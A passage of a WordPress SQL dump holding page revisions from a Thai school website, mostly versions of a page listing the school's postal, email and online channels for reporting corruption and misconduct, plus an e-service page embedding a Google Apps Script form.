class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-07 11:31:11','2025-07-07 04:31:11','',459,'http://pakhaeng.ssk.in.th/?p=1723',0,'revision','',0),
(1726,1,'2025-07-07 12:25:32','2025-07-07 05:25:32','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\"></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"layout\":\"vtabs\",\"currentTab\":3,\"minHeight\":31,\"maxWidth\":974,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"fe_user\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"fe_mail\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"fe_globe\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\",\"size\":\"md\",\"lineHeight\":10,\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"textTransform\":\"capitalize\",\"verticalTabWidth\":[16,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-3 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_user\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_mail\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span data-name=\"fe_globe\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/image {\"id\":1513,\"sizeSlug\":\"full\",\"link\":\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\",\"linkDestination\":\"custom\",\"uniqueID\":\"476_77c7af-0b\"} -->\n<figure class=\"wp-block-kadence-image kb-image476_77c7af-0b size-full\"><a href=\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\" class=\"kb-advanced-image-link\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"kb-img wp-image-1513\"/></a></figure>\n<!-- /wp:kadence/image --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-07 12:25:32','2025-07-07 05:25:32','',476,'http://pakhaeng.ssk.in.th/?p=1726',0,'revision','',0),
(1727,1,'2025-07-07 12:25:43','2025-07-07 05:25:43','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\"></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"layout\":\"vtabs\",\"minHeight\":31,\"maxWidth\":974,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"fe_user\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"fe_mail\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"fe_globe\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\",\"size\":\"md\",\"lineHeight\":10,\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"textTransform\":\"capitalize\",\"verticalTabWidth\":[16,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_user\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_mail\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span data-name=\"fe_globe\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/image {\"id\":1513,\"sizeSlug\":\"full\",\"link\":\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\",\"linkDestination\":\"custom\",\"uniqueID\":\"476_77c7af-0b\"} -->\n<figure class=\"wp-block-kadence-image kb-image476_77c7af-0b size-full\"><a href=\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\" class=\"kb-advanced-image-link\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"kb-img wp-image-1513\"/></a></figure>\n<!-- /wp:kadence/image --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-07 12:25:43','2025-07-07 05:25:43','',476,'http://pakhaeng.ssk.in.th/?p=1727',0,'revision','',0),
(1729,1,'2025-07-07 12:28:12','2025-07-07 05:28:12','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\"></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"currentTab\":3,\"minHeight\":31,\"maxWidth\":974,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"fe_user\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"fe_mail\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"fe_globe\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\",\"size\":\"md\",\"lineHeight\":10,\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"textTransform\":\"capitalize\",\"verticalTabWidth\":[16,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-3 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_user\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_mail\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span data-name=\"fe_globe\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/image {\"id\":1513,\"sizeSlug\":\"full\",\"link\":\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\",\"linkDestination\":\"custom\",\"uniqueID\":\"476_77c7af-0b\"} -->\n<figure class=\"wp-block-kadence-image kb-image476_77c7af-0b size-full\"><a href=\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\" class=\"kb-advanced-image-link\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"kb-img wp-image-1513\"/></a></figure>\n<!-- /wp:kadence/image --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-07 12:28:12','2025-07-07 05:28:12','',476,'http://pakhaeng.ssk.in.th/?p=1729',0,'revision','',0),
(1731,1,'2025-07-07 14:03:06','2025-07-07 07:03:06','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\"></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"currentTab\":3,\"minHeight\":31,\"maxWidth\":974,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"fe_user\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"fe_mail\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"fe_globe\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\",\"size\":\"md\",\"lineHeight\":10,\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"textTransform\":\"capitalize\",\"verticalTabWidth\":[16,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-3 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_user\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_mail\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span data-name=\"fe_globe\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/image {\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"uniqueID\":\"476_77c7af-0b\"} -->\n<figure class=\"wp-block-kadence-image kb-image476_77c7af-0b size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"kb-img wp-image-1604\"/></figure>\n<!-- /wp:kadence/image --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-07 14:03:06','2025-07-07 07:03:06','',476,'http://pakhaeng.ssk.in.th/?p=1731',0,'revision','',0),
(1733,1,'2025-07-07 14:07:32','2025-07-07 07:07:32','','corruption','','inherit','','closed','','corruption','','','2025-07-07 14:07:32','2025-07-07 07:07:32','',476,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/corruption.png',0,'attachment','image/png',0),
(1734,1,'2025-07-07 14:08:20','2025-07-07 07:08:20','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\"></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"currentTab\":3,\"minHeight\":31,\"maxWidth\":974,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"fe_user\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"fe_mail\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"fe_globe\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\",\"size\":\"md\",\"lineHeight\":10,\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"textTransform\":\"capitalize\",\"verticalTabWidth\":[16,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-3 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_user\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_mail\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span data-name=\"fe_globe\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  